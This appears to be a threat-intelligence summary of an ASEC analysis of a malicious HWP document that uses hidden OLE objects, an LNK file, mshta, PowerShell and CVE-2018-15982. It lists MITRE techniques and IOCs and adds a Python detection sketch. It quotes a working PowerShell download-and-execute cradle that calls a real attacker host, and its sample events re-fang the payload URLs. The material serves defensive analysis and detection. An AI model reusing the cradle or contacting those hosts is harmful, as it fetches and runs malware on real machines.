ASEC researchers identified a malicious HWP document that exploits OLE objects and a Flash vulnerability (CVE-2018-15982), using embedded links to trigger execution. The attack drops files in %TEMP%, hides OLE objects, and can download and run additional payloads via PowerShell and process hollowing, with the HWP file evolving to persist and reload embedded content. Hashtags: #CVE-2018-15982 #yukkimmo #sportsontheweb #Sjem #OLE #HWP #LNK #PowerShell #ProcessHollowing
Keypoints
- The HWP document is distributed with a misleading title and uses embedded hyperlinks to execute malicious actions when interacted with.
- OLE objects are hidden inside the document, and the files it creates in %TEMP% include hword.exe (a renamed copy of PowerShell), hwp.exe (a renamed copy of mshta), hwp.lnk (the malicious shortcut), and 1234dd.tmp (an additional HWP document).
- The document appears as a “profile form” and contains blank spaces and embedded hyperlinks to trigger the created malicious files.
- Clicking the hyperlinks leads to a command that ultimately uses mshta to reach a remote URL and execute further payloads.
- The attacker downloads additional PE data from a remote server and uses process hollowing to run it, saving results and creating a new HWP-like file in the Recent folder.
- An additional HWP variant (1234dd.tmp) is loaded by copying and renaming, preserving the embedded flash object and similar behaviors.
- IOCs include specific file hashes, certain URLs and domains, and multiple embedded filenames associated with the dropper and loader.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – The HWP document is distributed with a misleading title (e.g., “profile form”) to entice opening. Quote: “Judging by the content of the document, it appears that this document was distributed with a title such as ‘profile form’, similar to past cases.”
- [T1547.009] Shortcut Modification (the original ID T1023 is deprecated and has been folded into T1547.009) – LNK-based execution via an embedded link file that triggers payloads when clicked. Note that the LNK here is a one-shot execution trigger rather than a modified autostart shortcut, so the mapping is loose. Quote: “The link file that is run when the hyperlink is clicked contains the following command, so it ultimately accesses a malicious URL using mshta.”
- [T1218.005] Mshta – Use of mshta to execute a remote payload via a hyperlink. Quote: “thus accesses a malicious URL using mshta.”
- [T1203] Exploitation for Client Execution – Exploiting CVE-2018-15982 Flash vulnerability embedded in the HWP content. Quote: “This URL contains the flash vulnerability (CVE-2018-15982) file.”
- [T1059.001] PowerShell – The document uses PowerShell-based commands (e.g., hword.exe, a renamed powershell.exe) to download and execute payloads. Quote: "hword.exe -nop -c "iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')""
- [T1055.012] Process Hollowing – The downloaded PE data is executed via process hollowing on System32\cmd.exe. Quote: “This data is executed by using the process hollowing technique on System32\cmd.exe.”
- [T1105] Ingress Tool Transfer – The attacker downloads additional data (e.g., 2247529.txt) from a remote server. Quote: “The code downloads additional PE data from hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt and saves it in the %temp% folder as ‘2247529.txt’.”
Indicators of Compromise
- [Hash] 76f8ccf8313af617df28e8e1f7f39f73 – hwp (example hash cited for HWP dropper)
- [Hash] 9a13173df687549cfce3b36d8a4e20d3 – lnk (example hash cited for link file)
- [Hash] 804d12b116bb40282fbf245db885c093 – hwp
- [Hash] caa923803152dd9e6b5bf7f6b816ae98 – script
- [Hash] 2f4ed70149da3825be16b6057bf7b8df – exe
- [Hash] 65993d1cb0d1d7ce218fb267ee36f7c1 – SWF
- [Hash] 330f2f1eb6dc3d753b756a27694ef89b – hwp
- [URL] hxxp://yukkimmo.sportsontheweb[.]net/hw.php – payload URL used by the LNK/mshta chain
- [URL] hxxp://yukkimmo.sportsontheweb[.]net/h.txt – PowerShell script URL
- [URL] hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt – PE data download
- [URL] hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php – Flash vulnerability host
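The MITRE techniques and IOCs above describe a chain that is visible almost entirely in process-creation telemetry: renamed copies of powershell.exe and mshta.exe executed out of %TEMP%, a download-and-IEX cradle, mshta pointed at a remote URL, and contact with the payload host. The following is an added detection sketch (not code from the ASEC write-up) that runs those checks over a few constructed Sysmon-style process-creation events. The event field names, the `Event`/`analyze`/`scan` helpers and the ATT&CK labels attached to each check are my own assumptions; the domains, file names and command-line pattern come from the page.

```python
"""Detection sketch for the HWP -> LNK -> mshta -> PowerShell chain.
Added example; runs over constructed Sysmon Event ID 1-style events."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators taken from the write-up (defanged there, re-fanged here for matching).
IOC_DOMAINS = {"yukkimmo.sportsontheweb.net", "www.sjem.co.kr"}
DROPPED_NAMES = {"hword.exe", "hwp.exe", "hwp.lnk", "1234dd.tmp", "2247529.txt"}

# Behavioural patterns the chain exhibits.
TEMP_PATH = re.compile(r"\\(?:AppData\\Local\\Temp|Temp)\\", re.I)
POWERSHELL_CRADLE = re.compile(
    r"(?:\biex\b|invoke-expression).*?(?:downloadstring|downloadfile)", re.I)
MSHTA_REMOTE = re.compile(r"\bhttps?://", re.I)
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.I)


@dataclass
class Event:
    """Subset of a Sysmon process-creation event (field names assumed)."""
    image: str                  # full path of the started process
    original_file_name: str     # PE OriginalFileName, survives renaming
    command_line: str
    parent_image: str = ""


@dataclass
class Hit:
    technique: str
    reason: str


def analyze(ev: Event) -> List[Hit]:
    hits: List[Hit] = []
    name = ev.image.rsplit("\\", 1)[-1].lower()
    orig = ev.original_file_name.lower()

    # 1. LOLBin renamed to a dropper name: hword.exe is really powershell.exe,
    #    hwp.exe is really mshta.exe. OriginalFileName exposes the mismatch.
    if orig in {"powershell.exe", "mshta.exe"} and name != orig:
        hits.append(Hit("T1036.003", f"{orig} running under renamed image {name}"))

    # 2. A known dropped file name executed from %TEMP%.
    if TEMP_PATH.search(ev.image) and name in DROPPED_NAMES:
        hits.append(Hit("T1204.002", f"dropped file executed from temp: {name}"))

    # 3. PowerShell download cradle: -c "iex(new-object net.webclient).downloadstring(...)"
    if orig == "powershell.exe" and POWERSHELL_CRADLE.search(ev.command_line):
        hits.append(Hit("T1059.001", "PowerShell download-and-IEX cradle"))

    # 4. mshta launched with a remote URL on its command line.
    if orig == "mshta.exe" and MSHTA_REMOTE.search(ev.command_line):
        hits.append(Hit("T1218.005", "mshta fetching remote content"))

    # 5. Any URL in the command line pointing at a known payload host.
    for host in URL_HOST.findall(ev.command_line):
        if host.lower() in IOC_DOMAINS:
            hits.append(Hit("T1105", f"contact with known payload host {host.lower()}"))
    return hits


def scan(events: List[Event]) -> Dict[int, List[str]]:
    """Return the technique IDs fired per event index."""
    return {i: [h.technique for h in analyze(ev)] for i, ev in enumerate(events)}


# Constructed sample events: two from the chain, one benign control.
SAMPLE_EVENTS = [
    Event(r"C:\Users\u\AppData\Local\Temp\hwp.exe", "mshta.exe",
          r'"C:\Users\u\AppData\Local\Temp\hwp.exe" http://yukkimmo.sportsontheweb.net/hw.php',
          parent_image=r"C:\Windows\explorer.exe"),
    Event(r"C:\Users\u\AppData\Local\Temp\hword.exe", "powershell.exe",
          "hword.exe -nop -c \"iex(new-object net.webclient)"
          ".downloadstring('http://yukkimmo.sportsontheweb.net/h.txt')\""),
    Event(r"C:\Windows\System32\notepad.exe", "notepad.exe", "notepad.exe readme.txt"),
]

if __name__ == "__main__":
    for idx, ev in enumerate(SAMPLE_EVENTS):
        for hit in analyze(ev):
            print(f"event {idx}: [{hit.technique}] {hit.reason}")
```

The renamed-binary check depends on OriginalFileName (or an equivalent PE-version field) being logged; without it, hword.exe and hwp.exe look like ordinary user-dropped executables and only the path and command-line checks fire. The final stage, process hollowing into System32\cmd.exe, is not visible in process-creation events at all and needs memory or thread telemetry (e.g. Sysmon Event ID 8/10 or an EDR's injection sensors).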
Read more: https://asec.ahnlab.com/en/38479/